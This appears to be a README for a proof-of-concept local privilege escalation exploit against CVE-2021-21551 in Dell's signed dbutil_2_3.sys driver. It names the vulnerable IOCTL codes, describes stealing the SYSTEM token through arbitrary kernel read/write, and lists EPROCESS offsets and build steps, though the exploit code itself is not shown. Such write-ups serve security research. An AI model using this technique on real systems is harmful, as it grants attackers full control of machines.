Home

Awesome

CVE-2021-21551

Simple PoC for exploiting CVE-2021-21551 for LPE by spawning system cmd.

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21551

An issue was discovered in signed dell windows driver (dbutil_2_3.sys) which may lead to compromisation of whole local system. Driver's ioctl dispatch routine lacks of validation of user supplied buffer.

IOCTL

Anyone can create handle and issue ioctl requests to these ioctl codes which break windows security model:

Compiling PoC

This PoC exploits 0x9b0c1ec4/0x9b0c1ec8 ioctl codes for arbitrary kernel memory read/write respectively. Firstly it locates PsInitialSystemProcess in kernel to get system token and then it writes this token to current process EPROCESS struct. Before compiling update your EPROCESS offsets to avoid BSOD using https://www.vergiliusproject.com/

DWORD EPROCESS_ActiveProcessLinks = 0x2e8;
DWORD EPROCESS_Token = 0x348;

Use visual studio to compile (requires windows header). Ntdll SDK header: https://github.com/mathisvickie/segy-software/blob/main/external/ntdll.h

Running

Tested on:

Successful exploit will run system cmd. If you get bugcheck PAGE_FAULT_IN_NONPAGED_AREA then the offsets are probably incorrect. Sample output: 404